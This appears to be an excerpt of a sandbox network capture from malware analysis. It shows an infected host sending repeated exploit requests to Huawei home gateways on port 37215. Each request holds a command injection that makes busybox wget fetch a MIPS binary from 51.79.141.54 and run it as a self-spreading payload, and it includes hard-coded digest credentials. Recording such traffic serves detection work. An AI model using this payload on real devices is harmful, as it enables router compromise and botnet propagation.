                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.484842062 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    83192.168.2.1452450197.251.154.4637215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.149843931 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.496478081 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    84192.168.2.1458588186.184.213.12037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.149960041 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.514997959 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    85192.168.2.1447206197.60.100.14137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.149960041 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.514997959 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    86192.168.2.144751295.129.116.15837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.149960995 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.514997959 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    87192.168.2.144801489.92.141.4937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.155522108 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.567409992 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
